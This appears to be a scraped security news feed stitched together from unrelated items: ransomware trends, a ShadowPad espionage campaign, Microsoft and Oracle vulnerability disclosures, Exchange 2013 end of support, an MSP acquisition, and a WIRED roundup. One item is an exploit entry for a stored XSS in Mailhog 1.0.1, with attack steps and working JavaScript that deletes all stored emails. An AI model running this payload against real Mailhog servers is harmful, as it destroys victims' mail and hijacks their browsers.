RaaS model continues to be adopted by criminals looking to maximize their ROI, new study indicates

RaaS model continues to be adopted by criminals looking to maximize their ROI, new study indicates

The number of new ransomware families and unique variants has fallen over the last year, according to new research from WithSecure.

The company, formerly known as F-Secure Business, says in its latest Ransomware Threat Update (PDF) that the number of new families and unique variants appearing each year peaked around 2017, but stayed relatively stable for most of the second half of the last decade.

Last year, though, saw a significant drop in the amount of new ransomware families discovered by the researchers.

The main reason, says the firm, appears to be a consolidation of efforts by attackers, who are increasingly exploiting off-the-shelf Ransomware-as-a-Service (RaaS) packages.

**RELATED** DBIR 2022: Ransomware surge increases global data breach woes

“These days, cybercriminals are often operating as organisations, and they want to maximise their ROI,” Paolo Palumbo, vice president of WithSecure’s Tactical Defense Unit, tells _The Daily Swig_.

“In this sense, they are focusing their resources on getting a foothold in a victim’s system, rather than developing their own ransomware. People often forget that this isn’t a game of who makes the best ransomware – it’s about getting money out of victims.”

**Rise of RaaS**

Importantly, Palumbo says that the fall in the number of ransomware families doesn’t necessarily imply a fall in the number of attackers.

“Like many other businesses, cybercriminals are taking advantage of specialist tech vendors who prepare readily-available platforms to conduct these types of scams and attacks,” he says.

“But we shouldn’t assume it makes the users of these systems incompetent or any less expert.”

Read more of the latest infosec research news

Ransomware was the most widespread threat type identified in 2021, accounting for nearly 17% of identified threats.

And WannaCry was the most prevalent ransomware family – by a considerable margin, accounting for more than half of non-generic ransomware detections.

This was followed by three RaaS families: GandCrab, REvil, and Phobos.

**Double extortion**

In terms of tactics, threat actors are increasingly finding new ways of extorting cash from victims, for example by stealing data before encryption and threatening to leak it, with Maze and REvil the most notable examples of what’s been dubbed ‘double extortion’.

Malicious Microsoft Office documents and downloads were the most commonly observed ransomware attack vectors in 2021, followed by exploiting vulnerabilities and accessing networks via exposed Remote Desktop Protocol (RDP) ports.

WithSecure points out that many of these vectors rely on unpatched vulnerabilities – particularly in internet-facing infrastructure – poor password hygiene, lack of multi-factor authentication to secure online accounts, and other weaknesses that organizations should be able to address.

Meanwhile, says Palumbo, governments have their part to play.

“The role of governments and agencies is extremely important and multi-faceted,” he says.

“They need to continue pushing the importance of cybersecurity education and hygiene for both individuals and organizations, making it more difficult for cybercriminals to take advantage and extort money.”

**DON’T MISS** Researchers crack MEGA’s ‘privacy by design’ storage, encryption

Ransomware market evolution results in fewer variants, but rise in off-the-shelf cybercrime kits continues

Entities located in Afghanistan, Malaysia, and Pakistan are in the crosshairs of an attack campaign that targets unpatched Microsoft Exchange Servers as an initial access vector to deploy the ShadowPad malware.
Russian cybersecurity firm Kaspersky, which first detected the activity in mid-October 2021, attributed it to a previously unknown Chinese-speaking threat actor. Targets include

Entities located in Afghanistan, Malaysia, and Pakistan are in the crosshairs of an attack campaign that targets unpatched Microsoft Exchange Servers as an initial access vector to deploy the ShadowPad malware.

Russian cybersecurity firm Kaspersky, which first detected the activity in mid-October 2021, attributed it to a previously unknown Chinese-speaking threat actor. Targets include organizations in the telecommunications, manufacturing, and transport sectors.

"During the initial attacks, the group exploited an MS Exchange vulnerability to deploy ShadowPad malware and infiltrated building automation systems of one of the victims," the company said. "By taking control over those systems, the attacker can reach other, even more sensitive systems of the attacked organization."

ShadowPad, which emerged in 2015 as the successor to PlugX, is a privately sold modular malware platform that has been put to use by many Chinese espionage actors over the years.

While its design allows users to remotely deploy additional plugins that can extend its functionality beyond covert data collection, what makes ShadowPad dangerous is the anti-forensic and anti-analysis technique incorporated into the malware.

"During the attacks of the observed actor, the ShadowPad backdoor was downloaded onto the attacked computers under the guise of legitimate software," Kaspersky said. "In many cases, the attacking group exploited a known vulnerability in MS Exchange, and entered the commands manually, indicating the highly targeted nature of their campaigns."

Evidence suggests that intrusions mounted by the adversary began in March 2021, right around the time the ProxyLogon vulnerabilities in Exchange Servers became public knowledge. Some of the targets are said to have been breached by exploiting CVE-2021-26855, a server-side request forgery (SSRF) vulnerability in the mail server.

Besides deploying ShadowPad as "mscoree.dll," an authentic Microsoft .NET Framework component, the attacks also involved the use of Cobalt Strike, a PlugX variant called THOR, and web shells for remote access.

Although the final goals of the campaign remain unknown, the attackers are believed to be interested in long-term intelligence gathering.

"Building automation systems are rare targets for advanced threat actors," Kaspersky ICS CERT researcher Kirill Kruglov said. "However, those systems can be a valuable source of highly confidential information and may provide the attackers with a backdoor to other, more secured, areas of infrastructures."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

APT Hackers Targeting Industrial Control Systems with ShadowPad Backdoor

Under Coordinated Vulnerability Disclosure (CVD), cloud-security vendor Palo Alto Networks informed Microsoft of an issue affecting Service Fabric (SF) Linux clusters (CVE-2022-30137). The vulnerability enables a bad actor, with access to a compromised container, to escalate privileges and gain control of the resource’s host SF node and the entire cluster.

Under Coordinated Vulnerability Disclosure (CVD), cloud-security vendor Palo Alto Networks informed Microsoft of an issue affecting Service Fabric (SF) Linux clusters (CVE-2022-30137). The vulnerability enables a bad actor, with access to a compromised container, to escalate privileges and gain control of the resource’s host SF node and the entire cluster.

Though the bug exists on both Operating System (OS) platforms, it is only exploitable on Linux; Windows has been thoroughly vetted and found not to be vulnerable to this attack. The fix for this privilege escalation issue was made available on 26 May 2022 and has been applied to all customers subscribed to automatic updates.

**Customer Impact Customer Impact**

Customers without automatic updates enabled should upgrade their Linux clusters to the most recent SF release. Release notes can be found here. **Customers whose Linux clusters are automatically updated do not need to take further action**.

Additionally, if you are running SF Windows clusters, you are not impacted by this issue. However, we always recommend staying updated to the latest release.

Microsoft recommends that customers continue to review all containerized workloads (both Linux and Windows) which are permitted access to their host clusters. By default, a SF cluster is a single-tenant environment and thus there is no isolation between applications. Creating isolation is possible and additional guidance on hosting untrusted code can be found on the Azure Service Fabric security best practices page.

**Microsoft’s Mitigation Microsoft’s Mitigation**

Once this issue was reported to Microsoft, we took the following steps to investigate and mitigate the issue:

*   **24 May 2022** - We fixed the privilege escalation bug in the SF runtime and started updating the customers with automated updates enabled; specifically, the SF Diagnostics Collection Agent (DCA) was changed to not consume user-generated files written into the container’s log folder.
*   **09 Jun 2022** - We updated our public security guidanceincluding details regarding the implications of hosting untrusted code or having one’s containers compromised.
*   **14 Jun 2022** - CVE-2022-30137 was published for this issue and the fixes were deployed to customers leveraging automatic updates. Customers without automatic updates received portal notifications through Azure Service Health.

**Technical Details Technical Details**

For an attack to be successful on the vulnerability, these ordered steps are required:

*   **Step 1** : An attacker must compromise a containerized workload deployed by the owner of a Linux SF cluster.
    
*   **Step 2** : The hostile code running inside the container could substitute an index file read by DCA with a symlink.
    
*   Using an additional timing attack, an attacker could gain control of the machine hosting the SF node.
    

By design, root access on the machine hosting the SF node is not considered a security boundary in an SF cluster; the highest privileged role on a node is equally privileged anywhere in the same cluster.

Palo Alto Networks posted a blog about this issue available here. We appreciate the opportunity to investigate the findings reported by Palo Alto Networks and thank them for practicing safe security research under the terms of our bug bounty program. More information about the Microsoft Bug Bounty Program and the program’s Terms and Conditions can be found using these links.

**Additional references Additional references**

*   Microsoft published CVE-2022-30137
*   Azure Service Fabric release notes

Service Fabric Privilege Escalation from Containerized Workloads on Linux

Microsoft posted a reminder that Exchange Server 2013 is destined to reach end of support very, very soon.
The post You only have nine months to ditch Exchange Server 2013 appeared first on Malwarebytes Labs.

Microsoft has posted a reminder that Exchange Server 2013 reaches End of Support (EoS) on April 11, 2023.  That’s a little more than 9 months from now. A useful and timely reminder, since we all realize that it takes some time to migrate to a different system.

Every Windows product has a lifecycle. The lifecycle begins when a product is released and ends when it’s no longer supported. Knowing key dates in this lifecycle helps you make informed decisions about when to update, upgrade, or make other changes to your software.

**Exchange Server**

Microsoft Exchange Server is a groupware solution platform that provides many organizations with a mail server and calendaring server. It runs exclusively on Windows Server operating systems.

A few weeks ago Microsoft announced that the 2021 subscription model version of Exchange Server was not going to happen. So there may have been some questions whether the EoS for Exchange Server 2013 would go forward as planned. Now we know the answer: Yes.

Since the next on-premise version is not expected until the second half of 2025, your upgrade options are Exchange Server 2016 and Exchange Server 2019. Unless you want to migrate to the Exchange Online version.

**End of Support**

EoS (also called End-of-Life, or EoL) describes the final stage of a product’s lifecycle. Once a product reaches EoS, developers stop creating updates and patches for the product.

For Exchange Server 2013 this means that Microsoft will no longer provide:

*   Technical support for problems that may occur.
*   Fixes for usability or stability bugs.
*   Time zone updates.
*   Security fixes.

EoS makes the most basic security hygiene practice, “patch now”, impossible, and vulnerabilities discovered after EoS remain an open wound forever.

**Immediate threats**

Microsoft has chosen to further develop Exchange Server 2019, rather than come out with a completely new version. It mentioned the fact that state sponsored threat actors, like Hafnium, are targeting on-premises Exchange servers as one of the reasons for the cancellation of Exchange Server 2021.

The number and severity of active threats that target Exchange Server is worrying enough. And this will only get worse when one of the versions is no longer eligible for bug and security fixes.

The most prominent threats for Exchange Servers from last year were:

*   ProxyLogon that was used to infect thousands of servers before Microsoft released patches. targets on-premise Exchange servers.
*   ProxyOracle is a bit less numerous since threat actors have to trick users into clicking on a malicious link to steal the user’s password.
*   ProxyToken allows an unauthenticated attacker to perform configuration actions on mailboxes belonging to arbitrary users.
*   ProxyShell another on-premise Exchange Server vulnerability on unpatched servers with Internet access.

By now, all of the above have had patches created for them. Unfortunately that doesn’t mean that all vulnerable Exchange Servers have installed the relevant updates. But new vulnerabilities will be found. And vulnerabilities that work on a server software that no longer receives patches will be critical.

**Transition**

If you don’t want to get stuck with an unpatchable Exchange Server version, it is time to start planning, find the necessary budget, maybe think through what you are going to use next, and when is the best time for the transition.

Stay safe, everyone!

You only have nine months to ditch Exchange Server 2013

Mailhog version 1.0.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)# Google Dork: https://www.shodan.io/search?query=mailhog ( > 3500)# Date: 06.18.2022# Exploit Author: Vulnz# Vendor Homepage: https://github.com/mailhog/MailHog# Software Link: https://github.com/mailhog/MailHog# Version: 1.0.1# Tested on: Windows,Linux,Docker# CVE : N/AExplanation:Malicious users have the ability to send API requests to localhost and this request will be executed without any additional checks. As long as CSRF exists and unrestricted API calls as well, XSS could lead any API calls including  email deletion, sending, reading or any other call.Steps to reproduce:   1.   Create malicious attachment with payloads stated below   2.   Attach malicious file to email with payload (XSS)   3.   Send email   4.   Wait for victim to open email   5.   Receive data, get control of victim browser using Beef framework, or manipulate with API dataProof of Concept:<script>var XMLHttpFactories = [function () {    return new XMLHttpRequest()},function () {    return new ActiveXObject("Msxml2.XMLHTTP")},function () {    return new ActiveXObject("Msxml3.XMLHTTP")},function () {    return new ActiveXObject("Microsoft.XMLHTTP")}];function createXMLHTTPObject() {    var xmlhttp = false;    for (var i=0;i<XMLHttpFactories.length;i++) {        try {            xmlhttp = XMLHttpFactories[i]();        }        catch (e) {            continue;        }        break;    }    return xmlhttp;}var xhr = createXMLHTTPObject();xhr.open("DELETE", "http://localhost:8025/api/v1/messages", true);xhr.onreadystatechange = function(){    if (xhr.readyState == 4)        alert("Request completed, with the following status code: " +xhr.status);}xhr.send("");</script>

Mailhog 1.0.1 Cross Site Scripting

DSM is now the third acquisition by Thrive in Florida in the past six months.

FOXBOROUGH, Mass., June 24, 2022 /PRNewswire/ -- Thrive, a premier provider of NextGen Managed Services, announces today that it has acquired DSM, a Florida-based provider of managed IT services to State, Local, and Education (SLED) government agencies. The acquisition will enable DSM's existing government and corporate clients to benefit from Thrive's next-generation managed cybersecurity, global Cloud footprint, and Microsoft collaboration services while strengthening Thrive's offering to SLED agencies across the US.

Founded in 1986, DSM has been helping clients achieve their IT goals by providing innovative solutions for data protection, disaster recovery, and managed cloud services bolstered by their CJIS compliant data centers. Focusing on data assurance, DSM offers clients the ability to survive and recover quickly from a data breach or ransomware attack, ensuring business continuity. DSM's expert team of highly qualified professionals develop flexible and cost-effective solutions that address the challenges of customers that serve commercial, government, and CJIS-bound agencies.

"DSM is a leader in the SLED space with significant traction in the state of Florida. With this partnership, they'll be able to augment their Cloud-based service offerings via Thrive's SOC and comprehensive suite of cybersecurity services," said Rob Stephenson, Thrive's CEO. "DSM's talented engineers and experienced management team will help to greatly enhance our rapidly growing Florida presence, as well as position the SLED vertical to go national under their leadership."

"For over three decades, DSM's primary objective for our clients has been to optimize their digital transformation and their journey to the Cloud," said David Robinson, CEO and Founder of DSM. "We are delighted to be the newest members of the Thrive family as their dedication to providing a personalized IT path towards customer satisfaction complements our commitment to total IT peace of mind for our clients."

Robinson and Greg Madden, DSM's COO, will assume senior leadership roles and helm the newly established Thrive SLED group as a special unit focusing on existing government business in Florida, Alabama, and Massachusetts. In addition, Robinson and Madden will assist in Thrive's expansion of state and local contracts up and down the East Coast.

DSM is now the third acquisition by Thrive in Florida in the last six months and builds upon its established presence in the Southeast region. Thrive is a security-first MSP that delivers comprehensive managed services and unmatched expertise to drive secure digital transformation for small to mid-sized enterprises across multiple industries. For more information on Thrive, visit thrivenextgen.com.

**About Thrive**

Thrive is a leading provider of NextGen managed services designed to drive business outcomes through secure application enablement and optimization. The company's Thrive5 Methodology utilizes a unique combination of its Application Performance Platform and strategic services to ensure each business application achieves peak performance, scale, uptime, and the highest level of security. For more information, thrivenextgen.com.

Thrive: LinkedIn, Twitter, Facebook, YouTube and Instagram

**About DSM**

DSM redefines our client's business outcomes that they consider possible from their IT infrastructure ensuring that their data is protected and available when and where they need it, saving time and money. As our clients embark on their journey to trusted data availability, DSM guides them, allowing them to focus on their core business, rather than the technology that runs it.

Thrive Acquires DSM

Researchers describe discovery of ‘mega’ zero-day

Researchers describe discovery of ‘mega’ zero-day

Oracle has patched a remote code execution (RCE) vulnerability impacting Oracle Fusion Middleware and various other Oracle systems.

Security researchers ‘Peterjson’ and ‘Jang’ reported a pair of severe flaws to Oracle that can be chained to achieve RCE, which they dubbed the ‘Miracle Exploit’.

The researchers said they privately told Oracle about a serious vulnerability they discovered in Oracle Access Manager, tracked as CVE-2021–35587. The CVSS 9.8 bug is described as an “easily exploitable” flaw that allows unauthenticated attackers with network access via HTTP for application takeover.

**Accidental discovery**

Jang said the flaw was discovered by accident when the duo were “building a PoC \[proof of concept exploit code\] for another mega 0-day”.

While working with the Zero Day Initiative (ZDI), this research led to the discovery of CVE-2022–21445. This ‘mega’ bug, issued a severity score of 9.8, was found in the Oracle Application Development Framework (ADF) Faces architecture, a component of Oracle Fusion Middleware.

Catch up on the latest vulnerability-related security news and analysis

The deserialization of trusted data issue can be chained with CVE-2022–21497 (CVSS 8.1), a takeover flaw in Oracle Web Services Manager, to achieve pre-authentication RCE.

CVE-2022–21445 impacts a variety of products and services based on Fusion Middleware, various Oracle systems, and even Oracle’s cloud infrastructure. Unauthenticated attackers with network access, via HTTP, can abuse the vulnerability chain.

“One more thing to note, any website was developed by ADF Faces framework are affected,” Peterjson said.

**Disclosure and patches**

After testing Oracle services and domains, the vulnerability report was submitted to the vendor on October 25, 2021. In the same month, Oracle confirmed receipt of the report and said it was investigating. However, it took the best part of six months for a patch to be issued.

Both issues have been resolved in Oracle’s April round of patches. Oracle is one of many technology vendors, alongside Microsoft and Adobe, that releases a monthly patch update to tackle bugs in its software.

Companies utilizing vulnerable Oracle software are urged to apply the patch immediately.

Other vendors potentially impacted by the pre-auth RCE were notified via their respective bug bounty programs. Peterjson told The Stack that companies have been informed if they have not applied Oracle’s fix, and that he believes the number of exposed instances is “huge”.

“Why \[did\] we hack some Oracle’s sites? Because we want to demonstrate the impact to Oracle and let them know this vulnerability is super dangerous, it affects Oracle system\[s\] and Oracle’s customers,” Peterjson commented.

“That’s why we want Oracle take an action ASAP. But as you can see, 6 months for Oracle to patch it, I don’t know why, but we have to accept it and follow Oracle’s policy.”

The Daily Swig has reached out to Oracle and we will update this story if and when we hear back.

YOU MIGHT ALSO LIKE Splunk patches critical vulnerability while users push for legacy updates

Oracle patches ‘miracle exploit’ impacting Middleware Fusion, cloud services

If you use a mix of Apple, Android, and Windows gadgets, you're in luck: The security tool is now available to any Microsoft 365 subscriber.

Microsoft Defender, the company’s security app, is now available to any individual who has a subscription to Microsoft 365, the online productivity suite that includes Word, Excel, and more. Different from the previously released Microsoft Defender software that was built exclusively into Windows computers, this version is available on Windows, Android, macOS, and iOS devices.

Owners of Windows computers without Microsoft 365 don’t need to sweat; Microsoft is still preinstalling software on Windows to protect against viruses and other malware. That software is now simply branded as Windows Security. Beyond accessing a security dashboard where all your connected devices are visible, there’s not a lot of extra incentive for Windows owners to download the new Microsoft Defender app.

Microsoft is extending protection options to Mac and smartphone owners who use Microsoft 365. Not all devices receive the same protections, however. For example, on the Mac, anti-malware protection is provided by Microsoft Defender, while web protection is not.

On the other hand, iPhones and Android devices are able to use web protection from Microsoft Defender. The web protection runs a virtual private network on your smartphone in the background and tries to intervene if any dangerous hyperlinks appear. Microsoft claims that the data from your browsing history is stored on-device and not shared with the company. Learn even more about VPNs and boosting your digital privacy with WIRED senior writer and reviewer Scott Gilbertson’s guide to the best VPNs. In addition to web protection, the anti-malware protection from Microsoft Defender is supported for Android phones.

The new Microsoft Defender app is designed to be used specifically by consumers—as in families and individuals. Although the names are similar, Microsoft Defender for Endpoint is a separate security suite for businesses. Microsoft has guidance on its website to help you understand the Endpoint version and how to switch between accounts.

If you aren’t a Microsoft 365 subscriber but want to get Microsoft Defender, a personal plan costs $70 a year, and a family plan for up to six people costs $100 a year. With a subscription to Microsoft 365, you get OneDrive cloud storage access, in addition to both online and downloadable versions of popular software like Microsoft Word, Excel, and Powerpoint. (Check out this article from WIRED contributor David Nield if you’re on the hunt for a free version of Microsoft Word.)

So who will benefit from the new Microsoft Defender? The features offered are slim at the moment, and it might not be as involved as software from Norton or McAfee, but that may be a good thing considering Defender is more lightweight than either of those options. Keeping that in mind, the large quantity of devices tracked from a single dashboard could be a boon for family leaders trying to keep an eye on the whole crew’s security across multiple devices.

Subscribers to the Microsoft 365 individual plan can get Microsoft Defender to protect five devices at once. For those on the family plan, you can simultaneously shield up to 30 devices. The suite will send you alerts whenever Grandma downloads malware onto her computer (again) or the teens on their smartphones click a malicious link.

Searching for even more strategies to beef up your digital security? WIRED has helpful advice on everything from password protecting your files to keeping those spicy pics private. You wouldn’t leave your front door unlocked while running errands, and with so much of our lives experienced online, taking protective measures on your computer and smartphone makes just as much sense.

How to Use Microsoft Defender on All Your Devices

Plus: Microsoft details Russia’s Ukraine hacking campaign, Meta’s election integrity efforts dwindle, and more.

The United States Supreme Court yesterday struck down _Roe v. Wade_, the monumental 1973 decision that guaranteed the right to abortion in the US for 49 years and, as Maryn McKenna writes for WIRED, “revolutionized life for women.” Now, all of that is in peril. 

It is impossible to overstate the profound consequences of the court's decision. In addition to the life\-and\-death dangers now facing people who become pregnant, the end of _Roe_ and the rise of criminalized abortion stand to usher in a privacy nightmare that civil liberties advocates have warned about for decades. 

As we reported in May after a draft of the Supreme Court's decision was leaked to Politico, the criminalization of abortion in states across the US requires that people adopt a comprehensive digital privacy strategy to protect themselves from the surveillance state. This can include steps like switching to an end-to-end encrypted app like Signal, limiting your data footprint by using search engines like DuckDuckGo instead of Google, locking down your privacy settings on your phone, and using a browser extension to block web trackers. For more details on securing your digital privacy, we recommend guides from the Digital Defense Fund and the Electronic Frontier Foundation.

If you plan to protest against the Supreme Court's decision, check out our guide on how to protest safely. And if you're seeking information about receiving an abortion in post-_Roe_ America, we have a list of resources for that as well.

In other stories this week, we explained how to password-protect any file and dove into lingering security risks related to Microsoft's now defunct Internet Explorer browser. We got a look at Brave's new Goggles tool for its privacy-focused search engine, which lets you create custom search filters. We explored the ways in which the US intelligence community is using artificial intelligence. And we detailed a new type of spyware that Google and Lookout researchers say has been used to target people in multiple countries.

But that's not all. We've rounded up here the big security news from the past week that we haven't been able to cover ourselves. Click on the headlines to read the full stories. And stay safe out there.

Microsoft this week released a report diving into Russia's cyber efforts in its ongoing war against Ukraine. Researchers found that Russia has launched at least 48 attacks against Ukrainian entities. While some efforts have been successful, researchers found that rapidly deployed digital defenses have fended off many of these attacks, including a failed Russian military effort to deploy “wiper” malware against Ukrainian government computers. Vladimir Putin isn't limiting Russian hackers to targets in Ukraine, however. Microsoft researchers identified Russian “network intrusion efforts” against 128 organizations in 42 countries outside Ukraine. Moscow frequently targets the governments of NATO countries, and researchers say that Russian attacks have been successful 29 percent of the time. In a quarter of the successful attacks, Russian hackers have pilfered internal data from victims' networks. Microsoft also warns that Russia is carrying out global “cyber influence operations," at least some of which push propaganda encouraging people to not get vaccinated for Covid-19.

Despite political misinformation remaining rampant on Meta's platforms ahead of the midterm elections in November, CEO Mark Zuckerberg has reportedly shifted his attention from election-related issues to focus on the metaverse. According to multiple sources who spoke to _The_ _New York Times_, Facebook's “core election team … has been dispersed,” and just 60 people now focus on election integrity issues full-time. Company spokesperson Tom Reynolds disputed that figure, claiming that “hundreds" of people at Meta are focusing on election-related work.

Another day, another cryptocurrency company hack that nets criminals staggering amounts of money. The latest known attack, against California-based Web3 firm Harmony, targeted the blockchain bridge, an application used to transfer cryptocurrencies from one blockchain to another. The company says the hackers stole approximately $100 million in digital assets. Bridges are a known weak point in the crypto ecosystem. In late March, hackers believed to be part of North Korea's Lazarus Group made off with $540 million worth of cryptocurrency thanks to a bridge attack.

We've all been there: On your way home after a boozy night on the town, you realize you've misplaced a USB drive containing the names, addresses, birthdays, and tax-related information of every person in your city. Never happened to you? Well, a contractor in Amagasaki, Japan, wasn't so lucky. _The Guardian_ reports that the unnamed contractor lost a USB drive with the sensitive personal data of all 460,000 Amagasaki residents after a night of drinking at a restaurant. While the mistake is surely embarrassing, it hopefully won't lead to privacy breaches: According to city officials, the data was encrypted and they've found no evidence of leaks. Cheers!

Tag

#microsoft